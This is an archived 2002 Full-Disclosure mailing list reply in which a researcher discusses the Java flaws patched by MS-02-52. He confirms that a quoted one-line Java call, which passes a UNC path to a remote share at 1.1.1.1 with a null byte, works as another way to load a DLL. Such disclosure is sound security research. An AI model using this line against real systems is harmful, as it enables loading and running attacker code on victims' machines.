[Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52

From: Jouko Pynnonen (jouko@solutions.fi)
Date: 09/23/02

• Next message: Georgi Guninski: "[Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
• Previous message: Ron DuFresne: "[Full-Disclosure] The last word on the Linux Slapper worm"
• In reply to: Georgi Guninski: "[Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
• Next in thread: Georgi Guninski: "[Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
• Reply: Georgi Guninski: "[Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: jouko@solutions.fi (Jouko Pynnonen)
Date: Mon, 23 Sep 2002 18:41:15 +0300 (EEST)

On Mon, 23 Sep 2002, Georgi Guninski wrote:

> Does
> new com.ms.jdbc.odbc.JdbcOdbc("\\\\1.1.1.1\\share\\dll\000");
> work?

Yes, seems to work, so there's another way to exploit this one. It
requires that browsing internet shares works, which may limit the systems
where it can be exploited. Although there were other Java vulnerabilities
involving the use of shares, I never came to think about this way. MS may
have thought of this, but of course they don't mention this kind of
things during the "co-operation".

-- 
Jouko Pynnonen          Online Solutions Ltd       Secure your Linux -
jouko@solutions.fi      http://www.solutions.fi    http://www.secmod.com

• Next message: Georgi Guninski: "[Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
• Previous message: Ron DuFresne: "[Full-Disclosure] The last word on the Linux Slapper worm"
• In reply to: Georgi Guninski: "[Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
• Next in thread: Georgi Guninski: "[Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
• Reply: Georgi Guninski: "[Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages Re: [Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52 ... On Mon, 23 Sep 2002, Georgi Guninski wrote: ... requires that browsing internet shares works, ... Although there were other Java vulnerabilities ... things during the "co-operation". ... (NT-Bugtraq) [Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52 ... > On Mon, 23 Sep 2002, Georgi Guninski wrote: ... > requires that browsing internet shares works, ... Hehehehe - you don't expect microsoft to share info with you during ... "co-operation", do you? ... (Full-Disclosure)

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint